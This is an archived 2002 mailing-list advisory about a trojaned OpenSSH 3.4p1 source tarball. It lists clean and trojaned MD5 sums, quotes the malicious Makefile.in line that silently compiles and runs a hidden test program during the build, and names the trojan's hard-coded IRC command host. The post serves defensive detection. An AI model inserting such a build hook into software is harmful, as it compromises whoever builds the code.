Firewall Wizards mailing list archives

Re: OpenSSH 3.4p1 possibly trojaned

From: "Paul D. Robertson" <proberts () patriot net>
Date: Thu, 1 Aug 2002 08:33:09 -0400 (EDT)

On Thu, 1 Aug 2002, Paul D. Robertson wrote:

It would appear that the OpenSSH code for all the non-OpenBSD systems was
trojaned at some point pretty recently.  I just checked the MD5 (and
sources) of the version I put on my public-facing systems, and it's the
same as the FreeBSD ports one (clean):

# md5sum openssh-3.4p1.tar.gz
459c1d0262e939d6432f193c7a4ba8a8  openssh-3.4p1.tar.gz

I got that copy around 19:43 Eastern on July 17th.  If you pulled a copy
after that, it's probably worth a check.

Things to check:

MD5 of the trojaned tar.gz: 3ac9bc346d736b4a51d676faa2a08a57

Source addition:

openssh-3.4p1/openbsd-compat/Makefile.in:
 all: libopenbsd-compat.a
+       @ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh
./bf-test.out &

It looks to me as if it might try to clean this up after the source is
built, but I don't have a test enviornment I'm willing to sacrafice at the
moment.  If you don't have the tar.gz file to check the MD5 sum of and
you built from source, I'd recommend getting a new copy once the trojan
has been replaced, or grabbing a copy from somewhere like the FreeBSD
ports collection.,

Trojan connection:

203.62.158.32:6667 (web.snsonline.net)

This address and port look to be hard coded in the trojan.  It's probably
worth an outbound access list if you're worried- although the server seems
to be down at the moment.

Paul